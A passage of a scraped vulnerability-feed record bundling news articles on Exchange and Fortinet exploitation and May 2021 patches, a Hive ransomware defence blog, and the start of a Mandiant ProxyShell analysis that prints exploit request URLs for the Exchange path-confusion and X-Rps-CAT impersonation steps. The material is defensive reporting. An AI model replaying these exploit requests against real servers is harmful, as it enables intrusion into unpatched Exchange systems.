Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of many indicators of compromise (IOC) that\u2019s been spotted are new user accounts that may have been created by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, these threat actors are proved capable of all these operations, researchers said:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** TODAY, Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event**__**!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-11T23:10:25", "description": "Microsoft\u2019s May Patch Tuesday release addressed a modest 55 cybersecurity vulnerabilities, including just four critical bugs. It\u2019s the smallest monthly update from the computing giant since 2020, but it does contain a patch for a concerning wormable vulnerability found in the Windows OS.\n\nThe good news is that none of the vulnerabilities are being actively exploited in the wild, according to Microsoft, though three are listed as publicly known.\n\n[The fixes](<https://msrc.microsoft.com/update-guide/en-us>) address security flaws across Microsoft Windows, .NET Core and Visual Studio, Internet Explorer (IE), Microsoft Office, SharePoint Server, Open-Source Software, Hyper-V, Skype for Business and Microsoft Lync, and Exchange Server. Besides the four critical bugs, 50 are rated \u201cimportant\u201d and one is moderate in severity.\n\n## **Critical Microsoft Security Patches for May 2021**\n\nThe critical bugs in this month\u2019s Patch Tuesday release are:\n\n * [CVE-2021-31166](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>): A wormable HTTP protocol-stack issue in Windows 10 and some versions of Windows Server allowing remote code-execution (RCE)\n * [CVE-2021-26419](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26419>): A scripting-engine memory corruption vulnerability in Internet Explorer 11 and 9 allowing RCE\n * [CVE-2021-31194](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31194>): An RCE bug in the Microsoft Windows Object Linking and Embedding (OLE) Automation\n * [CVE-2021-28476](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28476>): An RCE vulnerability in Microsoft Windows Hyper-V\n\n### **CVE-2021-31166 \u2013 Wormable**\n\nThis most concerning critical bug for researchers is an HTTP protocol-stack issue that would allow RCE with kernel privileges or a denial-of-service (DoS) attack. The HTTP protocol stack enables Windows and applications to communicate with other devices; it can be run standalone or in conjunction with Internet Information Services (IIS).\n\n\u201cIf exploited, this vulnerability could enable an unauthenticated attacker to send a specially crafted packet to a targeted server utilizing the HTTP protocol stack (http.sys) to process packets and ultimately, execute arbitrary code, and take control of the affected system,\u201d Eric Feldman, cybersecurity researcher with Automox, wrote in [an analysis](<https://blog.automox.com/automox-experts-weigh-in-may-patch-tuesday-2021>).\n\nWorse, Microsoft noted that the bug is wormable, so that it could be used to self-replicate across the internal network and affect internal services that may not have been exposed.\n\n\u201cThe vulnerability announced has the potential to be both directly impactful and is also exceptionally simple to exploit, leading to a remote and unauthenticated DoS (Blue Screen of Death) for affected products,\u201d Steve Povolny, head of advanced threat research and principle engineer at McAfee, said via email. \u201cWhile this vulnerability has the potential to lead to code execution in the Windows kernel, this type of weaponization is a much higher bar for exploitation. However, if RCE can be achieved, cybercriminals would likely have the capability to create a worm, leading to self-propagation of the vulnerability across networks and the internet.\u201d\n\n\u201cFor ransomware operators, this kind of vulnerability is a prime target for exploitation,\u201d Kevin Breen, director of cyber-threat research at Immersive Labs, told Threatpost. \u201cWormable exploits should always be a high priority, especially if they are for services that are designed to be public facing. As this specific exploit would not require any form of authentication, it\u2019s even more appealing for attackers, and any organization using HTTP.sys protocol stack should prioritize this patch.\u201d\n\nDustin Childs, researcher with Trend Micro\u2019s Zero Day Initiative (ZDI), noted [in a blog](<https://www.zerodayinitiative.com/blog/2021/5/11/the-may-2021-security-update-review>), \u201cBefore you pass this aside, Windows 10 can also be configured as a web server, so it is impacted as well. Definitely put this on the top of your test-and-deploy list.\u201d\n\n### **CVE-2021-26419**\n\nThis second critical bug affecting Microsoft\u2019s legacy browser allows RCE, and offers several avenues of attack, according to researchers.\n\n\u201cIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website,\u201d explained Feldman. \u201cAn attacker could also embed an ActiveX control marked \u2018safe for initialization\u2019 in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\u201d\n\nThe best way to counteract this bug is ditching IE, noted Breen.\n\n\u201cInternet Explorer needs to die \u2013 and I\u2019m not the only one that thinks so,\u201d he told Threatpost. \u201cIf you are an organization that has to provide IE11 to support legacy applications, consider enforcing a policy on the users that restricts the domains that can be accessed by IE11 to only those legacy applications. All other web browsing should be performed with a supported browser.\u201d\n\n### **CVE-2021-31194**\n\nThe third critical bug exists in the Microsoft Windows OLE Automation, which in and of itself should place it on the priority-patch list, according to researchers.\n\n\u201cTo exploit the vulnerability, an attacker could host a specially crafted website designed to invoke OLE automation through a web browser,\u201d explained Justin Knapp, Automox researcher. \u201cHowever, this approach requires that the attacker bait a user into visiting the maliciously crafted website.\u201d\n\nHe pointed out that OLE technology has frequently been used to mask malicious code within documents and for linking to external files that infect systems with malware.\n\n\u201cIn 2020, the CISA released an alert detailing the top 10 routinely exploited vulnerabilities, which identified Microsoft\u2019s OLE as the most commonly exploited technology by state-sponsored cyber-actors,\u201d he said. \u201cConsidering the prevalent exploitation of OLE vulnerabilities, including those that had been flagged years ago, organizations should immediately prioritize patching all outstanding OLE vulnerabilities.\u201d\n\n### **CVE-2021-28476**\n\nThe last critical bug is found in Windows Hyper-V, which is a native hypervisor that can create and run virtual machines on x86-64 systems running Windows. It can allow an attacker to execute arbitrary code, Knapp said: \u201cTo exploit this vulnerability, an attacker could run a specially crafted application on a Hyper-V guest that could cause the Hyper-V host operating system to execute arbitrary code when it fails to properly validate vSMB packet data. Successful exploitation could enable an attacker to run malicious binaries on Hyper-V virtual machines or execute arbitrary code on the host system itself.\u201d\n\nThat said, Microsoft noted that an attacker is more likely to abuse the bug for DoS attacks in the form of a system crash rather than RCE, Childs pointed out, which mitigates the vulnerability\u2019s CVSS score of 9.9.\n\n\u201cBecause of this, it could be argued that the attack complexity would be high, which changes the CVSS rating to 8.5,\u201d he said. \u201cThat still rates as high-severity, but not critical. Still, the bug check [system crash] alone is worth making sure your Hyper-V systems get this update.\u201d\n\n## **Publicly Disclosed Vulnerabilities**\n\nChris Goettl, senior director of product management at Ivanti, told Threatpost that the biggest patching priority should be the publicly disclosed bugs \u2013 even though there is as yet no known malicious exploitation.\n\n\u201cThe top concern from the Microsoft updates this month is the update for Microsoft Exchange that includes the fix for [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), which made its debut in the [2021 Pwn2Own competition](<https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results>),\u201d he said.\n\nThe bug tracked as CVE-2021-31207 is only rated as \u201cmoderate,\u201d but the \u201csecurity feature-bypass exploit was showcased prominently in the Pwn2Own contest and at some point details of the exploit will be published,\u201d Goettl explained. \u201cAt that point threat actors will be able to take advantage of the vulnerability if they have not already begun attempting to reverse engineer an exploit.\u201d\n\nThere two other publicly disclosed vulnerabilities resolved by Microsoft this month that exist in Common Utilities, found in the NNI open-source toolkit ([CVE-2021-31200](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31200>)), and in .NET and Visual Studio ([CVE-2021-31204](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31204>)).\n\n\u201cCommon Utilities and .NET and Visual Studio are less likely to be targeted, but due to the public disclosures they should not be ignored for long,\u201d Goettl added.\n\n## **Other Notable Microsoft Security Patches for May 2021**\n\nAs for the other patches in the update that stood out to the research community, ZDI\u2019s Childs highlighted a Windows wireless networking information-disclosure bug, tracked as [CVE-2020-24587](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-24587>).\n\n\u201cThe ZDI doesn\u2019t normally highlight info disclosure bugs, but this one has the potential to be pretty damaging,\u201d Childs said. \u201cThis patch fixes a vulnerability that could allow an attacker to disclose the contents of encrypted wireless packets on an affected system. It\u2019s not clear what the range on such an attack would be, but you should assume some proximity is needed. You\u2019ll also note this CVE is from 2020, which could indicate Microsoft has been working on this fix for some time.\u201d\n\n### **Windows Graphics, SharePoint Server Patches**\n\nA trio of local privilege escalation flaws \u2013 two in the Windows Graphics Component ([CVE-2021-31188](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31188>), [CVE-2021-31170](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31170>)) and one in SharePoint Server ([CVE-2021-28474](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28474>)) \u2013 caught Breen\u2019s eye.\n\nAs for the first two, he noted they could be chained with another bug, such as the wormable bug listed above, to become highly dangerous and allow for [WannaCry-style attacks](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\n\u201cThis kind of vulnerability is often used by attackers after they have already gained a foothold through an initial infection vector, like phishing or via another exploit like the RCE in HTTP.sys (CVE-2021-31166),\u201d Breen noted via email. \u201cThe attackers are looking to increase their privileges so they can move laterally across a network or gain access to other accounts that may have access to more sensitive information.\u201d\n\nMeanwhile, the SharePoint bug allows an authenticated attacker to run code on remote SharePoint Servers.\n\n\u201cAs this is post-authentication, it\u2019s likely to be used as part of post-exploitation and lateral movement phases of an attack, rather than the initial-infection vector,\u201d Breen said. \u201cAttackers could gain access to sensitive documents or even replace real documents with weaponized versions, enabling the compromise of more user devices across the organization\u2019s network.\u201d\n\n### **Microsoft Exchange Server Patches**\n\nMicrosoft also patched four vulnerabilities in Microsoft Exchange Server. The flaws ([CVE-2021-31198](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31198>), RCE; [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>), spoofing; [CVE-2021-31209](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31209>), security bypass; and [CVE-2021-31195](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31195>), RCE), are all rated important or moderate.\n\n\u201cCVE-2021-31195 is attributed to Orange Tsai of the DEVCORE research team, who was responsible for disclosing the [ProxyLogon Exchange Server](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) vulnerabilities that [were] patched in an out-of-band release back in March,\u201d Satnam Narang, staff research engineer with Tenable, told Threatpost. \u201cWhile none of these flaws are deemed critical in nature, it is a reminder that researchers and attackers are still looking closely at Exchange Server for additional vulnerabilities, so organizations that have yet to update their systems should do so as soon as possible.\u201d\n\nAnd finally, Ivanti\u2019s Goettl noted that several Microsoft products have reached end-of-life and won\u2019t be getting support going forward.\n\n\u201cThis month marks the final update for several Windows 10 and Server editions, so make sure you have updated any systems to newer branches to avoid a disruption in security update coverage come June,\u201d he said. \u201cWindows 10 1803 and 1809 and Server 1909 all received their final update on May Patch Tuesday 2021.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and **[**Register HERE**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)** for free. **\n", "cvss3": {}, "published": "2021-05-11T20:05:44", "type": "threatpost", "title": "Wormable Windows Bug Opens Door to DoS, RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24587", "CVE-2021-26419", "CVE-2021-28474", "CVE-2021-28476", "CVE-2021-31166", "CVE-2021-31170", "CVE-2021-31188", "CVE-2021-31194", "CVE-2021-31195", "CVE-2021-31198", "CVE-2021-31200", "CVE-2021-31204", "CVE-2021-31207", "CVE-2021-31209"], "modified": "2021-05-11T20:05:44", "id": "THREATPOST:A2FE619CD27EBEC2F6B0C62ED026F02C", "href": "https://threatpost.com/wormable-windows-bug-dos-rce/166057/", "cvss": {"score": 0.0, "vector": "NONE"}}], "pentestpartners": [{"lastseen": "2023-05-15T15:16:47", "description": "\n\n### Why Now?\n\nHive is not a new problem. It first surfaced in 2021 but it\u2019s becoming a much bigger issue now. This is due to a growing number of affiliates and therefore attacks. 2022 has seen more widespread country and industry target interest too.\n\nRansomware growth in general is becoming a massive problem, so much so that these incidents now make up the majority of UK government [crisis management COBRA meetings](<https://therecord.media/ransomware-incidents-now-make-up-majority-of-british-governments-crisis-management-cobra-meetings/>).\n\n### What is Hive Ransomware?\n\nHive is ransomware-as-a-service (RaaS). It\u2019s maintained by dedicated developers with affiliates using it to conduct high impact ransomware attacks with far reaching consequences.\n\nHive is organised in such a way that they have customer service, help desk, and sales departments. Victims are even directed to log in to a portal to make payment, using credentials the attackers drop in one of the files they leave behind after an attack.\n\n### Who is this Threat Group?\n\nThe Hive gang is a Ransomware as a Service (RaaS) provider first identified in June 2021. Although relatively new, their aggressive tactics and ever evolving malware variants have made them one of the most successful RaaS groups of its kind.\n\nIt's claimed some big victims, for example [Tata Power just one month ago](<https://www.bleepingcomputer.com/news/security/hive-claims-ransomware-attack-on-tata-power-begins-leaking-data/>).\n\n### How are they targeting victims?\n\nPhishing emails are sent with malicious payloads (e.g. Cobalt Strike) to get VPN credentials, and then scan for vulnerable remote desktop servers for lateral movement.\n\n### What do they do once they're inside?\n\nIt's all about data exfiltration, with encryption of files on the network.\n\n### Why should I act now?\n\nCybersecurity experts largely believe Hive is allied with Conti. The Hive ransomware gang is just over a year old but has already allied with more traditional ransomware groups, promoting itself as one of the top three most active ransomware groups in July 2022.\n\nThe gang is more active and aggressive than ever, with the affiliates attacking between three to five organisations every day since the operation became known in late June 2021.\n\nOn 17th November 2022 the hacker group claimed responsibility of taking down a USA based health care provider. Hive appears to have demanded a ransom of $900,000. In exchange, the organisation would agree to delete all the data.\n\nTechRepublic amongst other outlets on the on 25th October 2022 named Hive Ransomware within the current top four most dangerous and destructive ransomware groups of 2022. Attacks from this gang alone jumped by 188% from February to March 2022, according to NCC\u2019s March Cyber Threat Pulse report. This ransomware variant was also one of the top four most observed in Q3 of 2022 it is expected to only get more prominent as more affiliates use RaaS with new vulnerabilities such as zero-day attacks to aid in initial intrusion.\n\nIn Q3 2022 Hive ransomware hit 15 countries, with the US and UK being the top targets, respectively.\n\nThe ransomware is super-fast, capable of encrypting 4GB of data per minute. Hive hires penetration testers, access brokers, and other threat actors who continue to develop the threat, techniques, and tactics.\n\nIn May 2022 the gang targeted Costa Rica when the country was reeling from a cyberattack by Conti. Only weeks after the Costa Rican president declared an emergency following that first ransomware attack Hive joined in and crippled the country\u2019s public health service, the Costa Rican Social Security Fund.\n\n### Has it really got more serious? Why should I be concerned?\n\nHive ransomware was last upgraded in July 2022, according to Microsoft Threat Intelligence Centre (MSTIC). Researchers noted that Hive migrated its malware code from GoLang to Rust last month. Rust offers memory, data type, thread safety, deep control over low-level resources, a user-friendly syntax, access to a variety of cryptographic libraries, and is relatively more difficult to reverse-engineer.\n\nThe July update also includes string encryption and more complicated encryption mechanisms that leverage Elliptic Curve Diffie-Hellmann (ECDH) with Curve25519 and XChaCha20-Poly1305 (authenticated encryption with ChaCha20 symmetric cipher). Instead of embedding an encrypted key in each file that it encrypts, it generates two sets of keys in memory, uses them to encrypt files, and then encrypts and writes the sets to the root of the drive it encrypts, both with .key extension.\n\n### I run Linux so I'm OK, right?\n\nHive introduced Linux and FreeBSD encryption capabilities in October 2021. At the time ESET, who discovered these capabilities, clarified that the Linux variant of the ransomware was functionally inadequate compared to its Windows variant. 'Functionally inadequate' doesn't mean that Linux is safe though.\n\n### What have Hives core target industries looked like?\n\nThe industrials sector is still the most common target however hive have broadened their target victims to include energy, resources, agriculture, academic, educational, science institutions, car dealerships, financial, media, electronic distributers and healthcare. In November 2022 Q3, the Hive ransomware hit 15 countries, with the U.S. and the U.K. as the top two targets respectively.\n\n### What can be done to mitigate?\n\nBetter focus on preventing social engineering attacks, adopt defines-in-depth combination of policies, technical defences, and education for end users\u201d Human errors is currently responsible for 82% of data breaches according to Verizon\u2019s 2022 Data Breach Investigations Report.\n\nPatch patch patch! Monitor the CISA\u2019s Known Exploited Vulnerability Catalogue to identify weaknesses.\n\nHive is famously seeking targets using vulnerable Exchange Servers, with some of the critical vulnerabilities and inclusive patch information detailed below:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) - Microsoft Exchange Server Security Feature Bypass Vulnerability\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) - Microsoft Exchange Server Remote Code Execution Vulnerability\n * [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) - Microsoft Exchange Server Privilege Escalation Vulnerability\n\nImplement, develop phishing-resistant multi-factor authentication (MFA) technique.\n\nWhere SIEM or ELK Stack solutions are in force, develop the decoders and rules.\n\n### Hive is in my organisation, what happens now and what should I do?\n\nI strongly encourage organisations to start action now to mitigate and reduce the risk and impact of ransomware incidents. Below are areas to focus on when looking at your SIEM, EDR and monitoring solutions.\n\nOnce in your estate Hive ransomware will immediately start working on evasion detection, by executing processes. This is how you deal with it.\n\n**Hive behaviour:** Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption. \n**Advice:** NGAVs will typically pick up on this behaviour these days, however offsite backups should be adopted.\n\n**Hive behaviour:** Remove all existing shadow copies and stop the volume shadow copy services via vssadmin on command line or via PowerShell. \n**Advice:** NGAVs will typically pick up on this behaviour these days, however offsite backups should be adopted.\n\n**Hive behaviour:** Delete Windows event logs, specifically the System, Security and Application logs. \n**Advice:** Make sure you are forwarding logs to an external source that cannot be moved to laterally by the threat actors, ensure logs are also replicated elsewhere or offline storage/backup is utilised which can later be restored.\n\nAlso, implement data backups and encrypt data at rest, also practice your recovery procedures with regular drills.\n\nQuickly isolate any infected devices to prevent the ransomware from spreading further throughout your network. To do this, IT administrators must have up-to-date knowledge of all assets in the organisation and the tools to easily manage them, depending on how far the attack is in progress it may be prudent to shut down affected machines immediately, if backups are not available a provider may be able to perform data carving on offline-disks however this is a long-winded process so concentrate on you most critical data assets.\n\nIf your data has been stolen, take steps to protect your company and notify those who might be affected. It is recommended to report the attack right away to the authorities who may have knowledge of other attacks and can aid in an investigation by sharing knowledge.\n\nContact us if you need help.\n\nThe post [Hive Ransomware is on the rise. How should you deal with it?](<https://www.pentestpartners.com/security-blog/hive-ransomware-is-on-the-rise-how-should-you-deal-with-it/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-18T06:44:42", "type": "pentestpartners", "title": "Hive Ransomware is on the rise. How should you deal with it?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-11-18T06:44:42", "id": "PENTESTPARTNERS:77A7D085A837F9542DA633DA83F4A446", "href": "https://www.pentestpartners.com/security-blog/hive-ransomware-is-on-the-rise-how-should-you-deal-with-it/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2021-09-07T14:46:37", "description": "In August 2021, Mandiant Managed Defense identified and responded to the exploitation of a chain of vulnerabilities known as ProxyShell.** **The ProxyShell vulnerabilities consist of three CVEs (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting the following versions of on-premises Microsoft Exchange Servers.\n\n * Exchange Server 2013 (Cumulative Update 23 and below)\n * Exchange Server 2016 (Cumulative Update 20 and below)\n * Exchange Server 2019 (Cumulative Update 9 and below)\n\nThe vulnerabilities are being tracked in the following CVEs:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \nCVE-2021-34473\n\n| \n\nHigh\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--8e100992-6111-54ed-96b4-f817cf47edd0>) \n \nCVE-2021-34523\n\n| \n\nLow\n\n| \n\nLocal\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--f8db969d-dddf-5b2e-81ce-439289be6cde>) \n \nCVE-2021-31207\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--5c5c0f7e-96a8-5403-8487-373322342c46>) \n \nTable 1: List of May & July 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\n#### Overview\n\nMicrosoft Exchange Server provides email and supporting services for organizations. This solution is used globally, both on-premises and in the cloud. This chain of vulnerabilities exists in unpatched on-premises editions of Microsoft Exchange Server only and is being actively exploited on those servers accessible on the Internet.\n\nMandiant responded to multiple intrusions impacting a wide variety of industries including Education, Government, Business services, and Telecommunications. These organizations are based in the United States, Europe, and Middle East. However, targeting is almost certainly broader than directly observed.\n\nOne specific targeted attack observed by Mandiant, detailed in this post, was against a US-based university where UNC2980 exploited ProxyShell vulnerabilities to gain access to the environment.\n\n#### The Exploit Chain Explained\n\nProxyShell refers to a chain of attacks that exploit three different vulnerabilities affecting on-premises Microsoft Exchange servers to achieve pre-authenticated remote code execution (RCE). The exploitation chain was discovered and [published](<https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell>) by Orange Tsai (@orange_8361) from the DEVCORE Research Team.\n\n##### Delivering the Payload\n\nIn order to later create a web shell on a Microsoft Exchange server by exporting from a mailbox, an attacker first needs to create an email item within a mailbox. In the Metasploit implementation of the attack, the Autodiscover service is abused to leak a known user\u2019s distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then leveraged to leak the user's security identifier (SID), by passing the previously leaked DN as a request. The SID is then used to forge an access token to communicate with Exchange Web Services (EWS).\n\nWith the attacker able to successfully impersonate the target user with a valid access token, they can perform EWS operations. To continue with the ProxyShell attack, the operation \u2018CreateItem\u2019 is used, which allows the remote creation of email messages in the impersonated user\u2019s mailbox. While responding, Mandiant has seen draft emails with attached web shells, encoded in such a way that they become decoded upon export to PST later in the attack (specifically with permutative encoding).\n\nEmails may also be placed in targeted users' mailboxes via SMTP, as was suggested in Orange Tsai\u2019s documentation of the attack.\n\n##### CVE-2021-34473 \u2014 Pre-auth Path Confusion Leads to ACL Bypass\n\nMicrosoft Exchange has a feature called \u2018Explicit Logon\u2019, which legitimately allows users to open another user's mailbox or calendar in a new browser window by providing the mailbox address in the URL. The feature was designed to only provide access where \u2018Full Access\u2019 is granted to the user, and the target mailbox or calendar is configured to publish. Exchange is designed to normalize the specified mailbox address in the URL to identify the target.\n\nThe vulnerability exists in passing the string Autodiscover/Autodiscover.json to the email field in the URL. By passing that string, Exchange does not perform sufficient checks on the address, and through its normalization process, this leads to arbitrary access to backend URLs as NT AUTHORITY/SYSTEM.\n\nGET /autodiscover/autodiscover.json?@evil.corp/?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nGET /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nPOST /autodiscover/autodiscover.json?@evil.corp/autodiscover/autodiscover.xml?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nPOST /autodiscover/autodiscover.json?@evil.corp/mapi/emsmdb?&Email=autodiscover/autodiscover.json%3F@evil.corp \n \n--- \n \nFigure 1: Requests showing how an attacker can abuse the normalization process of the Explicit Logon feature\n\n##### CVE-2021-34523 \u2014 Elevation of Privilege on Exchange PowerShell Backend\n\nThe Exchange PowerShell Remoting feature, natively built into Microsoft Exchange, was designed to assist with administrative activities via the command line. The previous exploit allowed an attacker to interface with arbitrary backend URLs as NT AUTHORITY/SYSTEM, however since that user does not have a mailbox, the attacker cannot directly interface with the PowerShell backend (/Powershell) at that privilege level.\n\nThe PowerShell backend checks for the X-CommonAccessToken header in incoming requests. If the header does not exist, another method is used to get a CommonAccessToken. This method checks for the X-Rps-CAT parameter in the incoming request, and if present, deserializes this to a valid CommonAccessToken. With the previously collected information on the target mailbox or default information from built-in mailboxes, passing of a valid X-Rps-CAT value is trivial.\n\nBy passing this value to the PowerShell backend with the previously successful access token, an attacker can downgrade from the NT AUTHORITY/SYSTEM account to the target user. This user must have local administrative privileges in order to execute arbitrary Exchange PowerShell commands.\n\nPOST /autodiscover/autodiscover.json?a=abcde@evil.com/powershell/?X-Rps-CAT=[Base64 encoded data] \n \n--- \n \nFigure 2: This request uses the parameter X-Rps-CAT, which allows valid user impersonation\n\n##### 